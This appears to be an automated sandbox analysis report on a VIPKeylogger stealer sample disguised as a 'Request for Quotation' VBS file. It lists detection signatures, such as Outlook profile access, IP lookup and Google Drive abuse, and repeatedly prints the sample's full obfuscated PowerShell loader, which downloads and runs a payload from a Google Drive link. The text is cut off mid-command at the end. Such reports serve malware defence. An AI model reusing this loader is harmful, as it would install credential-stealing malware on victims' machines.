Malware Analysis Report

2024-11-30 14:57

Sample ID 241104-gc8zysxphj
Target 0bdcef1bfa0aaab36d678b6615963b6a1f536cfb2216c6d76186476375c05e8c
SHA256 0bdcef1bfa0aaab36d678b6615963b6a1f536cfb2216c6d76186476375c05e8c
Tags
execution vipkeylogger collection discovery keylogger stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0bdcef1bfa0aaab36d678b6615963b6a1f536cfb2216c6d76186476375c05e8c

Threat Level: Known bad

The file 0bdcef1bfa0aaab36d678b6615963b6a1f536cfb2216c6d76186476375c05e8c was found to be: Known bad.

Malicious Activity Summary

execution vipkeylogger collection discovery keylogger stealer

Vipkeylogger family

VIPKeylogger

Blocklisted process makes network request

Checks computer location settings

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Command and Scripting Interpreter: PowerShell

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

Suspicious behavior: EnumeratesProcesses

outlook_office_path

outlook_win_path

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-04 05:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-04 05:40

Reported

2024-11-04 05:43

Platform

win7-20241010-en

Max time kernel

150s

Max time network

19s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Quotation_MYMRT.vbs"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Quotation_MYMRT.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Overjealously Henblikkets Prearrangement Tidmangelen #>;$kookeree='Desensitize';<#Umisforstaaeligheds Kludged Edingtonite Funktionskort #>; function Unclogs($Ruskregne){If ($host.DebuggerEnabled) {$Approximatenfold++;}$voice=$Flittiglisernes+$Ruskregne.'Length' - $Approximatenfold; for ( $Approximate=5;$Approximate -lt $voice;$Approximate+=6){$Benedicerendes=$Approximate;$Hittite44+=$Ruskregne[$Approximate];}$Hittite44;}function Stormagtskonflikten($Bolstederne){ .($Popsanger) ($Bolstederne);}$Domesticeringernes=Unclogs ' ,dskMFatheoSpritzResoriHalfwlStavelAnem aMult./S rud ';$Gttevrkets=Unclogs 'U sagTKeratlDoce scale 1Rntge2hilbo ';$Kalaset='O,cip[MelleNSpidsEjellyt Cont. Lgstsarb,jE V inrDubitVPhil,IBacchcF turET matPTestaoEpiphiSch,dNBostyTwhipsMsteapACephanPoseraDulc GVarifePsychrCheva]no el:outsm: MdeasKasseeBetr.cRed.cuCapitr EneriMik,oTEkspoYSvovlPTemper SansoSu.faT Kne OEsc iC H deo scutlDecim=,elon$Blythg NatstS verTOmkrsEBiosyvBac frno arkPurliEOph,lTledelsBookn ';$Domesticeringernes+=Unclogs 'Grade5Subma. Divi0Frdig Slidd(For,eWForfliC.urnnPartidArgumoUdkrewRu,insBasia NeddmN.hickTfluid kramm1Overf0Philo. Frai0Stude;Hauss .ikarW tymi ChrinRaadv6Eunuc4Bulim; cod. HypopxFinan6Overm4Sort.; Besh G.thrLactevArkit:T.ipo1Longi3 Obs,1Nonva.Stalw0 Proc) Le n NonprGHistoe Di pcBrandkCrescoSubat/Pol r2 Thre0Sixer1Firef0Hepto0For.k1 b il0Jaghi1Bibli GwineFTyvstiUntu.r ContePelobf I teoSavlexPeddi/ awn1Dukke3 Befr1Morti.S ing0Azotu ';$Skolemnds=Unclogs 'M crouPrio SGytasEFo ieRPro i-UforgaDcth GGaardE Eft,nAfghaTPosse ';$Balletdanseren=Unclogs 'Rrfl h ,ivitM.noctIndbapLan is,onis:purve/Idiod/Unde,d HvesrElektidiss v ResteTr,gl. Su cgUnaddoInt.roregulg KalilCityte Tame.Fis,ecEraseoakrosm B,dr/ bankuQuatecExurb? 
romaeMun,mx FolkpOutjuoIronhrBarogtAjo.r=Freied AwayoStartwDupernOntogl StraoOpsiga Sancd Rise& Pha.i Mor d sra=Fulds1 KrobFDrmmeitopfoselain2F,rgim ssasc Curp5GenneDRentehMar pl SkrilfacunXunwa wKalunQ ToroKTypo,s scorURes,wYEcb,ltOmplaP LivsY ,istbHydroq TeksnRgerlEgooro_.rkitn Beg,2 ServxHypohXEj ct9 ,estPApote ';$Adead=Unclogs 'Sweaz>Abrup ';$Popsanger=Unclogs 'YdelsIPolypESkiffXRclam ';$Bregnerdderne238='Prveballons229';$Riverwise='\precompelling.Wit';Stormagtskonflikten (Unclogs 'Zooli$ TestG Irr.L.ntieo tupebNi,roA brndLCerio:FryseuLaa.tNI dbia FlyvtP osetKommuEAer fnArchau HaplALinjeT VulgeJ,rdldObtru=Hacie$ProbleApathNTre lVSeign:CreneAThixlPUdsulPAppendRetn AHirplTImpasADovek+T ven$ScoutRAspa i.ninnVScenaeSoelvrpagenw nsuiIMooras HeltEDecar ');Stormagtskonflikten (Unclogs ' G wd$ Yoemg Sab l lokpoBit ebDatarADhalsLMulti:NondeADosisfSpillbCondyaalfedRHeltakFriseEEriabDO.ontEBroho=Sikk $End.cBIlliqA DbesL icrolRetsiEMaal.tSqua dMilieaSam en fnyssAnlacEDimwirPara.EunshrN Nabo.Dec mSAntipPAlkohlSkabaIInarcTAut n( Diss$ThromAHeapeDWanteeS.rabaRectod A ar)Fngse ');Stormagtskonflikten (Unclogs $Kalaset);$Balletdanseren=$Afbarkede[0];$Pseudoprophetic=(Unclogs 'Coeva$SydligStraiLLanciO BlambankarAun.erl Ruf.:Sa ttf.aemorOrigiAAr,anTMilzbR OuttILaypecChe oE Blo,l .linlNskedIFir b= MatzNMa ieEBerbeWForud-En ocoRefraBNewtsJin.elEPinloCSekstT N.ns Sel rsSnarey Melos ShibtEliz eRedesMTaple.CrystNAlte eStag TDisso.LobelWTrje.eVaarebKanticArbejlGyngeiLighte rub.n Pr.ftGru d ');Stormagtskonflikten ($Pseudoprophetic);Stormagtskonflikten (Unclogs 'Bagfl$SnkelFKaukarEpidiaSpalat ynkrMimediTartrcIllureAsi.hlFaultlRese iForkt.AmoraH .ndieAbsina LestdBiaseeFaderr .edisI.dgr[Hegni$BoolsS.nletk AfproBillelSkylleNominmIntranDrueadBugvgsUmb s]Caskt=Fonot$MnstrDPiet oVandrmOrkese f,rss Sodet rippiUncomcPotfue varsrWardriSelvfnG ynhg Garve des rStraan nadjeOpmars esin ');$Kraplak=Unclogs 'Indkr$GjedoF.ismurThoraaSerfdtSessirForboiIndtac nedbePlo tlV derlCoanniStuvn.Fngs,DSaluboGe 
erwdisfanOpverlRipenoslee a MicrdAp erFZ.gonireboilFo eseBelre(udsa $ DelvBrefleaPurublKonfolFremgePrambtHorisdGrunda nhann Ma.tsRhymieFornyr.ortreTortunNeu o,Stem,$bankeM Usaai Tr,akNonocr Bundoconvuf proliFove lH.moem HereesarcenSka.psUnamu)advis ';$Mikrofilmens=$Unattenuated;Stormagtskonflikten (Unclogs 'Nierf$spiraGspayrlSluknOMul tB SnorADagsal Angu: ProtSAd okvIndusIUtopiNBit ee egnesUn.tiT ichIRappoereconRPol g=kon e(DensaTAdduceBahanSKlkniTSprog-TjrehP tora.lueftEndeghAntip ,oret$CoracMst vaiPostmKv ldlRImpeto GideF ,erriPersoLOprrsm CresEIn,ekNen lesCourt) tild ');while (!$Svinestier) {Stormagtskonflikten (Unclogs 'Ursic$ GammgFiftyl Re do elfabNonnoaGermal Pros:Ma.kiRkonsteS lsogHalvfoRenrirUsknngImpe e iewpdUnder=Rudol$KalmytlystfrBorogubere.eMac o ') ;Stormagtskonflikten $Kraplak;Stormagtskonflikten (Unclogs 'FreonS arnsTCzechaEuropROutfiTForep-Grundshok.dLDenitEAblooeMaccaP Ex a ,usin4humin ');Stormagtskonflikten (Unclogs 'Micro$automgSodaklIn,tiO PostBBulltASt knlForso: S.orSA,thoVKilobiSalpeN pfolEOft nSMicr T ekski DomseN,kesrMyxop= Sti (H antTHa meEJa ovs Peept Coff- .ntipSpgelARe naTBr chHOr,de ytho$TygniM S.eei eripKMadeiRpreglo HypeF WatcI Neb LFogedMOrnamEgtternIg,ngsAstig)Debou ') ;Stormagtskonflikten (Unclogs ' Do n$A poiGRu inLBoendOSlskiB Stemasl sklDybs :MajesfForrauSikk LRoll dAgatibDe roEOecisfGysenA A,boR Bl gE ContN LettTHirsc=B yba$ nglugP ytylFord OWrathBTypolA ProslWooll:De asNA.svioBlennn.pholIAnmelNLystpTMollieS imiRRepinpOverloDeducl AnanAKbestt B.adiQuartO AiglNYdels+ arpa+Forfl% Basi$Un laASpn ifJordfBNephraSkattRsporskdoorhEArterDAli ne Octi. 
GenrCMutatOOmf ruSulevnBotrytK.mme ') ;$Balletdanseren=$Afbarkede[$Fuldbefarent];}$Peroxyl=312718;$Ruskendes254=32260;Stormagtskonflikten (Unclogs ' Cent$BourdgD nnilHundeOFribbbCombiA MiniLEcorc:Ar,hrC HowieLimstn ofretA.staR HedganymphlAnon,B E,vaif lmbB nstilSubliI upploReg ltLea.lE Hebek ThanEE,ecttStykesFolli Komm= Aftr ComptGVu cae TripT bayo-Nse ocretraoBagbun isketUndereBehovnSemifTDisti Ensi$Glas.MUklarISlutsKForanrAstr,OTr prf enhoiMorsiLArkivmPrizeeFootsn SurisKonto ');Stormagtskonflikten (Unclogs 'Stats$FinangCheirl Me co Fredb,arabaDyrkel C lh: A,idENervsf FlavfMiliteBrnehk Obclt Trsku FugleDenimr SpliiKakaonS ibsgKompaeC rrur Over Toil= Krem Ops e[ C anSOffenyAfruns,eignt PiraeAtlasm Raa . isquCGodkeoVejrmn enervUncites,ruerColont ,iks]Troub:Zoili:BichrFMononrSterso M slmuntunBEscheaBrug.sTypoge nva6Fyrre4Lsr.vSsh,pstPlantrCentii Ank n.kramgFordr(sepia$NisnaCDiadeeNummenKickotRecovrWou daSq irltastebCu geiKlippbreincl lamiPohapoFuturt T igeKisbokDeareeVer etLoesssSpott)Limit ');Stormagtskonflikten (Unclogs ' Drmm$GstelG,emogLformtO On.dbAllocaInko lUnder:Zar.bF AartoDithir EskaKBew tANyquiManl sr Sel EN.tli Hudor=Genda Spild[O.dstSsjlssySubliSAttertRegieE Ka sMTrisi. Tarwt.bscaeAdatjX MeriTChrem.MajusE livenPakkeC OpleO B ngdSelvhIN rmaNBar egIm.ib]Annui:Klaus:ChairajerimSSmergcHyperiSgnedIUdbaa. KdkrG BreveReinttant pSMatemT ksperPlagiISem nNV gnrGAirst( rebo$ ZapoEBe aafMa daFStemnEDis gkTilriT tudiU LulleSkaltrDomm.i,ommenGodviGF emve YndeR Un c)F,sto ');Stormagtskonflikten (Unclogs 'Sats $HavagG nmanlSpit,op ilaB TilsAMeasolAnati:,lommTGen ea OggaR,orilA olignBredstJagtrIInsi SlimnotZo,el=For a$StlndFCit ooTrep,RSociakObseraHjre,mKla lRRetroE,arke.Fejltssailou traBhjdedSNett TF,rderge,ati DecanDiskegTjr e(Velou$.unctpSemi E KaolrMockfOPrewexMinigY JungLReimb,Unsta$ hylarPo ssUChainSUnchrkbl,kdeDiagnNExactdCa.loeScunnS Read2Ind.s5Imper4Re ni)C,rat ');Stormagtskonflikten $Tarantist;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\Cab255E.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2896-20-0x000007FEF68AE000-0x000007FEF68AF000-memory.dmp

memory/2896-21-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-22-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-23-0x000000001B360000-0x000000001B642000-memory.dmp

memory/2896-24-0x00000000024E0000-0x00000000024E8000-memory.dmp

memory/2896-25-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-26-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-27-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-28-0x000007FEF68AE000-0x000007FEF68AF000-memory.dmp

memory/2896-29-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-30-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-31-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-32-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-04 05:40

Reported

2024-11-04 05:43

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Quotation_MYMRT.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Vipkeylogger family

vipkeylogger

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | checkip.dyndns.org | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Quotation_MYMRT.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Overjealously Henblikkets Prearrangement Tidmangelen #>;$kookeree='Desensitize';<#Umisforstaaeligheds Kludged Edingtonite Funktionskort #>; function Unclogs($Ruskregne){If ($host.DebuggerEnabled) {$Approximatenfold++;}$voice=$Flittiglisernes+$Ruskregne.'Length' - $Approximatenfold; for ( $Approximate=5;$Approximate -lt $voice;$Approximate+=6){$Benedicerendes=$Approximate;$Hittite44+=$Ruskregne[$Approximate];}$Hittite44;}function Stormagtskonflikten($Bolstederne){ .($Popsanger) ($Bolstederne);}$Domesticeringernes=Unclogs ' ,dskMFatheoSpritzResoriHalfwlStavelAnem aMult./S rud ';$Gttevrkets=Unclogs 'U sagTKeratlDoce scale 1Rntge2hilbo ';$Kalaset='O,cip[MelleNSpidsEjellyt Cont. Lgstsarb,jE V inrDubitVPhil,IBacchcF turET matPTestaoEpiphiSch,dNBostyTwhipsMsteapACephanPoseraDulc GVarifePsychrCheva]no el:outsm: MdeasKasseeBetr.cRed.cuCapitr EneriMik,oTEkspoYSvovlPTemper SansoSu.faT Kne OEsc iC H deo scutlDecim=,elon$Blythg NatstS verTOmkrsEBiosyvBac frno arkPurliEOph,lTledelsBookn ';$Domesticeringernes+=Unclogs 'Grade5Subma. Divi0Frdig Slidd(For,eWForfliC.urnnPartidArgumoUdkrewRu,insBasia NeddmN.hickTfluid kramm1Overf0Philo. Frai0Stude;Hauss .ikarW tymi ChrinRaadv6Eunuc4Bulim; cod. HypopxFinan6Overm4Sort.; Besh G.thrLactevArkit:T.ipo1Longi3 Obs,1Nonva.Stalw0 Proc) Le n NonprGHistoe Di pcBrandkCrescoSubat/Pol r2 Thre0Sixer1Firef0Hepto0For.k1 b il0Jaghi1Bibli GwineFTyvstiUntu.r ContePelobf I teoSavlexPeddi/ awn1Dukke3 Befr1Morti.S ing0Azotu ';$Skolemnds=Unclogs 'M crouPrio SGytasEFo ieRPro i-UforgaDcth GGaardE Eft,nAfghaTPosse ';$Balletdanseren=Unclogs 'Rrfl h ,ivitM.noctIndbapLan is,onis:purve/Idiod/Unde,d HvesrElektidiss v ResteTr,gl. Su cgUnaddoInt.roregulg KalilCityte Tame.Fis,ecEraseoakrosm B,dr/ bankuQuatecExurb? 
romaeMun,mx FolkpOutjuoIronhrBarogtAjo.r=Freied AwayoStartwDupernOntogl StraoOpsiga Sancd Rise& Pha.i Mor d sra=Fulds1 KrobFDrmmeitopfoselain2F,rgim ssasc Curp5GenneDRentehMar pl SkrilfacunXunwa wKalunQ ToroKTypo,s scorURes,wYEcb,ltOmplaP LivsY ,istbHydroq TeksnRgerlEgooro_.rkitn Beg,2 ServxHypohXEj ct9 ,estPApote ';$Adead=Unclogs 'Sweaz>Abrup ';$Popsanger=Unclogs 'YdelsIPolypESkiffXRclam ';$Bregnerdderne238='Prveballons229';$Riverwise='\precompelling.Wit';Stormagtskonflikten (Unclogs 'Zooli$ TestG Irr.L.ntieo tupebNi,roA brndLCerio:FryseuLaa.tNI dbia FlyvtP osetKommuEAer fnArchau HaplALinjeT VulgeJ,rdldObtru=Hacie$ProbleApathNTre lVSeign:CreneAThixlPUdsulPAppendRetn AHirplTImpasADovek+T ven$ScoutRAspa i.ninnVScenaeSoelvrpagenw nsuiIMooras HeltEDecar ');Stormagtskonflikten (Unclogs ' G wd$ Yoemg Sab l lokpoBit ebDatarADhalsLMulti:NondeADosisfSpillbCondyaalfedRHeltakFriseEEriabDO.ontEBroho=Sikk $End.cBIlliqA DbesL icrolRetsiEMaal.tSqua dMilieaSam en fnyssAnlacEDimwirPara.EunshrN Nabo.Dec mSAntipPAlkohlSkabaIInarcTAut n( Diss$ThromAHeapeDWanteeS.rabaRectod A ar)Fngse ');Stormagtskonflikten (Unclogs $Kalaset);$Balletdanseren=$Afbarkede[0];$Pseudoprophetic=(Unclogs 'Coeva$SydligStraiLLanciO BlambankarAun.erl Ruf.:Sa ttf.aemorOrigiAAr,anTMilzbR OuttILaypecChe oE Blo,l .linlNskedIFir b= MatzNMa ieEBerbeWForud-En ocoRefraBNewtsJin.elEPinloCSekstT N.ns Sel rsSnarey Melos ShibtEliz eRedesMTaple.CrystNAlte eStag TDisso.LobelWTrje.eVaarebKanticArbejlGyngeiLighte rub.n Pr.ftGru d ');Stormagtskonflikten ($Pseudoprophetic);Stormagtskonflikten (Unclogs 'Bagfl$SnkelFKaukarEpidiaSpalat ynkrMimediTartrcIllureAsi.hlFaultlRese iForkt.AmoraH .ndieAbsina LestdBiaseeFaderr .edisI.dgr[Hegni$BoolsS.nletk AfproBillelSkylleNominmIntranDrueadBugvgsUmb s]Caskt=Fonot$MnstrDPiet oVandrmOrkese f,rss Sodet rippiUncomcPotfue varsrWardriSelvfnG ynhg Garve des rStraan nadjeOpmars esin ');$Kraplak=Unclogs 'Indkr$GjedoF.ismurThoraaSerfdtSessirForboiIndtac nedbePlo tlV derlCoanniStuvn.Fngs,DSaluboGe 
erwdisfanOpverlRipenoslee a MicrdAp erFZ.gonireboilFo eseBelre(udsa $ DelvBrefleaPurublKonfolFremgePrambtHorisdGrunda nhann Ma.tsRhymieFornyr.ortreTortunNeu o,Stem,$bankeM Usaai Tr,akNonocr Bundoconvuf proliFove lH.moem HereesarcenSka.psUnamu)advis ';$Mikrofilmens=$Unattenuated;Stormagtskonflikten (Unclogs 'Nierf$spiraGspayrlSluknOMul tB SnorADagsal Angu: ProtSAd okvIndusIUtopiNBit ee egnesUn.tiT ichIRappoereconRPol g=kon e(DensaTAdduceBahanSKlkniTSprog-TjrehP tora.lueftEndeghAntip ,oret$CoracMst vaiPostmKv ldlRImpeto GideF ,erriPersoLOprrsm CresEIn,ekNen lesCourt) tild ');while (!$Svinestier) {Stormagtskonflikten (Unclogs 'Ursic$ GammgFiftyl Re do elfabNonnoaGermal Pros:Ma.kiRkonsteS lsogHalvfoRenrirUsknngImpe e iewpdUnder=Rudol$KalmytlystfrBorogubere.eMac o ') ;Stormagtskonflikten $Kraplak;Stormagtskonflikten (Unclogs 'FreonS arnsTCzechaEuropROutfiTForep-Grundshok.dLDenitEAblooeMaccaP Ex a ,usin4humin ');Stormagtskonflikten (Unclogs 'Micro$automgSodaklIn,tiO PostBBulltASt knlForso: S.orSA,thoVKilobiSalpeN pfolEOft nSMicr T ekski DomseN,kesrMyxop= Sti (H antTHa meEJa ovs Peept Coff- .ntipSpgelARe naTBr chHOr,de ytho$TygniM S.eei eripKMadeiRpreglo HypeF WatcI Neb LFogedMOrnamEgtternIg,ngsAstig)Debou ') ;Stormagtskonflikten (Unclogs ' Do n$A poiGRu inLBoendOSlskiB Stemasl sklDybs :MajesfForrauSikk LRoll dAgatibDe roEOecisfGysenA A,boR Bl gE ContN LettTHirsc=B yba$ nglugP ytylFord OWrathBTypolA ProslWooll:De asNA.svioBlennn.pholIAnmelNLystpTMollieS imiRRepinpOverloDeducl AnanAKbestt B.adiQuartO AiglNYdels+ arpa+Forfl% Basi$Un laASpn ifJordfBNephraSkattRsporskdoorhEArterDAli ne Octi. 
GenrCMutatOOmf ruSulevnBotrytK.mme ') ;$Balletdanseren=$Afbarkede[$Fuldbefarent];}$Peroxyl=312718;$Ruskendes254=32260;Stormagtskonflikten (Unclogs ' Cent$BourdgD nnilHundeOFribbbCombiA MiniLEcorc:Ar,hrC HowieLimstn ofretA.staR HedganymphlAnon,B E,vaif lmbB nstilSubliI upploReg ltLea.lE Hebek ThanEE,ecttStykesFolli Komm= Aftr ComptGVu cae TripT bayo-Nse ocretraoBagbun isketUndereBehovnSemifTDisti Ensi$Glas.MUklarISlutsKForanrAstr,OTr prf enhoiMorsiLArkivmPrizeeFootsn SurisKonto ');Stormagtskonflikten (Unclogs 'Stats$FinangCheirl Me co Fredb,arabaDyrkel C lh: A,idENervsf FlavfMiliteBrnehk Obclt Trsku FugleDenimr SpliiKakaonS ibsgKompaeC rrur Over Toil= Krem Ops e[ C anSOffenyAfruns,eignt PiraeAtlasm Raa . isquCGodkeoVejrmn enervUncites,ruerColont ,iks]Troub:Zoili:BichrFMononrSterso M slmuntunBEscheaBrug.sTypoge nva6Fyrre4Lsr.vSsh,pstPlantrCentii Ank n.kramgFordr(sepia$NisnaCDiadeeNummenKickotRecovrWou daSq irltastebCu geiKlippbreincl lamiPohapoFuturt T igeKisbokDeareeVer etLoesssSpott)Limit ');Stormagtskonflikten (Unclogs ' Drmm$GstelG,emogLformtO On.dbAllocaInko lUnder:Zar.bF AartoDithir EskaKBew tANyquiManl sr Sel EN.tli Hudor=Genda Spild[O.dstSsjlssySubliSAttertRegieE Ka sMTrisi. Tarwt.bscaeAdatjX MeriTChrem.MajusE livenPakkeC OpleO B ngdSelvhIN rmaNBar egIm.ib]Annui:Klaus:ChairajerimSSmergcHyperiSgnedIUdbaa. KdkrG BreveReinttant pSMatemT ksperPlagiISem nNV gnrGAirst( rebo$ ZapoEBe aafMa daFStemnEDis gkTilriT tudiU LulleSkaltrDomm.i,ommenGodviGF emve YndeR Un c)F,sto ');Stormagtskonflikten (Unclogs 'Sats $HavagG nmanlSpit,op ilaB TilsAMeasolAnati:,lommTGen ea OggaR,orilA olignBredstJagtrIInsi SlimnotZo,el=For a$StlndFCit ooTrep,RSociakObseraHjre,mKla lRRetroE,arke.Fejltssailou traBhjdedSNett TF,rderge,ati DecanDiskegTjr e(Velou$.unctpSemi E KaolrMockfOPrewexMinigY JungLReimb,Unsta$ hylarPo ssUChainSUnchrkbl,kdeDiagnNExactdCa.loeScunnS Read2Ind.s5Imper4Re ni)C,rat ');Stormagtskonflikten $Tarantist;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Overjealously Henblikkets Prearrangement Tidmangelen #>;$kookeree='Desensitize';<#Umisforstaaeligheds Kludged Edingtonite Funktionskort #>; function Unclogs($Ruskregne){If ($host.DebuggerEnabled) {$Approximatenfold++;}$voice=$Flittiglisernes+$Ruskregne.'Length' - $Approximatenfold; for ( $Approximate=5;$Approximate -lt $voice;$Approximate+=6){$Benedicerendes=$Approximate;$Hittite44+=$Ruskregne[$Approximate];}$Hittite44;}function Stormagtskonflikten($Bolstederne){ .($Popsanger) ($Bolstederne);}$Domesticeringernes=Unclogs ' ,dskMFatheoSpritzResoriHalfwlStavelAnem aMult./S rud ';$Gttevrkets=Unclogs 'U sagTKeratlDoce scale 1Rntge2hilbo ';$Kalaset='O,cip[MelleNSpidsEjellyt Cont. Lgstsarb,jE V inrDubitVPhil,IBacchcF turET matPTestaoEpiphiSch,dNBostyTwhipsMsteapACephanPoseraDulc GVarifePsychrCheva]no el:outsm: MdeasKasseeBetr.cRed.cuCapitr EneriMik,oTEkspoYSvovlPTemper SansoSu.faT Kne OEsc iC H deo scutlDecim=,elon$Blythg NatstS verTOmkrsEBiosyvBac frno arkPurliEOph,lTledelsBookn ';$Domesticeringernes+=Unclogs 'Grade5Subma. Divi0Frdig Slidd(For,eWForfliC.urnnPartidArgumoUdkrewRu,insBasia NeddmN.hickTfluid kramm1Overf0Philo. Frai0Stude;Hauss .ikarW tymi ChrinRaadv6Eunuc4Bulim; cod. HypopxFinan6Overm4Sort.; Besh G.thrLactevArkit:T.ipo1Longi3 Obs,1Nonva.Stalw0 Proc) Le n NonprGHistoe Di pcBrandkCrescoSubat/Pol r2 Thre0Sixer1Firef0Hepto0For.k1 b il0Jaghi1Bibli GwineFTyvstiUntu.r ContePelobf I teoSavlexPeddi/ awn1Dukke3 Befr1Morti.S ing0Azotu ';$Skolemnds=Unclogs 'M crouPrio SGytasEFo ieRPro i-UforgaDcth GGaardE Eft,nAfghaTPosse ';$Balletdanseren=Unclogs 'Rrfl h ,ivitM.noctIndbapLan is,onis:purve/Idiod/Unde,d HvesrElektidiss v ResteTr,gl. Su cgUnaddoInt.roregulg 